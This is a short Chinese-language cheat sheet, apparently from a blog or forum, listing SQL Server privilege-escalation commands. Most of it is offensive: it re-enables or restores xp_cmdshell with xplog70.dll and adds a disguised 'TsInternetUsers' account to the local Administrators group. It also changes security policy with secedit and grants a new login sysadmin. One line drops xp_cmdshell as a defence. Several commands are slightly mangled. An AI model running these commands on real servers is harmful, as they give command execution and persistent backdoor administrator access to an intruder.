互联网上对SQL Server各种各样的语句都做了很多的总结,在此为大家在补充一些提升权限相关命令及防范…… 程序代码开启cmdshell的SQL语句 EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 恢复xp_cmdshell Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 否则上传xplog7.0.dll Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll' 堵上cmdshell的SQL语句 sp_dropextendedproc "xp_cmdshell" DOS: dir c:/ dir d:/ dir e:/ .net user TsInternetUsers Password /add net localGroup Administrators TsInternetUsers /add 备份恢复IPSEC secedit /export /CFG c:/tmp.inf echo sedenynetworklogonright =>>c:/tmp.inf secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf SQL: exec master..sp_addlogin UserName,Password exec master..sp_addsrvrolemember UserName,sysadmin